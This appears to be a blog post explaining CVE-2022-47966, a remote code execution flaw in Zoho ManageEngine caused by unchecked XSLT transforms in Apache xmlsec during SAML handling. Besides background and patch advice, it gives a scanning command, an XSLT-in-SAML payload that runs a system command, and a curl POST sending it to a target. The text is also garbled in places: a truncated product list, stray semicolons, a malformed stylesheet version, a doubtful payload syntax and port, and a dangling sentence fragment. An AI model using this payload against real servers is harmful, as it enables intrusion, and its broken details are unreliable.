CVE-2022-47966 - Remote Code Execution in Zoho ManageEngine via Apache XMLSec Vulnerability
In early 2023, cybersecurity researchers and Zoho themselves announced a critical security bug—CVE-2022-47966—impacting multiple Zoho ManageEngine on-premise products, including ServiceDesk Plus up to version 14003. This highly exploitable bug allows an attacker to run code remotely on the target server, potentially compromising the entire network. In this post, we’ll break down what CVE-2022-47966 is, how it works, share code samples for detection and exploitation, and link to trusted references.
What Is CVE-2022-47966?
CVE-2022-47966 is a Remote Code Execution (RCE) vulnerability. It happens because Zoho’s ManageEngine products used the xmlsec (Apache XML Security for Java) library, specifically version 1.4.1, which had a known weakness. That version supported advanced features (like XSLT for XML Signature processing), but left security checks up to the applications using it.
Zoho’s applications didn't put in those protections—leaving the door open for attackers.
...and more
(Always check the latest advisory for up-to-date lists.)
Reference Links
- Zoho Security Advisory
- NIST NVD Entry
- Rapid7 Analysis
Details: Why Does This Vulnerability Exist?
The heart of the problem is the use of XSLT transforms in xmlsec, which allow attackers to provide arbitrary stylesheets as part of specially crafted SAML requests or XML documents. If the system doesn’t sufficiently check and restrict these transforms, they can be weaponized to run machine code.
This bug matters especially if SAML Single Sign-On (SSO) is enabled (even if not currently active), because that code path will be open.
Library in question: xmlsec v1.4.1 (Apache XML Security for Java)
- Feature misused: XSLT Transforms (allows running attacker-controlled extensions during XML parsing)
- Protections missing: Applications must block or sanitize XSLT usage — but Zoho’s software failed to do so before patch 14004.
1. Detecting an Exposed Service
On a target organization, you might scan for ServiceDesk Plus or a Zoho app on the default port (usually 808):
nmap -p 808 -A <target-ip>
You might check /userLogin, /samlLogin, or /xmlsec endpoints.
2. Sending a Malicious SAML Request
A basic exploitation path is via SAML SSO. Below is an example of a SAML response with an XSLT payload that spawns a calculator on Windows (for demonstration):
<saml:Assertion ...>
<ds:Signature>
<ds:SignedInfo>
<ds:Reference URI="">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">;
<xsl:stylesheet version="1."
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">;
<xsl:template match="/">
<xsl:value-of select="Runtime.getRuntime().exec('calc.exe')" />
</xsl:template>
</xsl:stylesheet>
</ds:Transform>
</ds:Transforms>
</ds:Reference>
</ds:SignedInfo>
...
</ds:Signature>
</saml:Assertion>
> Note: This is a simplified snippet. In practice, you’d build a valid, signed SAML response, embedding the payload.
Attackers can send a crafted POST request
curl -k -X POST http://<target-ip>:808/SamlResponse -d @malicious_response.xml
3. What Happens?
If vulnerable, the server will parse the SAML assertion, process the malicious XSLT, and (for some payloads) execute commands with the privileges of the user running the Zoho web server.
Gain a permanent remote foothold in enterprise networks.
Read more on early exploits from Rapid7’s report.
Conclusion
CVE-2022-47966 is a classic example of why third-party components and “secure-by-default” settings are so important. If you run any Zoho ManageEngine product, patch *today* to stay safe from serious remote code execution.
More Reading
- ManageEngine Security Advisory (Official)
- NVD Details
- Shadowserver Foundation — Exploit Tracking
Stay safe, and always monitor your third-party libraries!
Timeline
Published on: 01/18/2023 18:15:00 UTC
Last modified on: 02/09/2023 19:15:00 UTC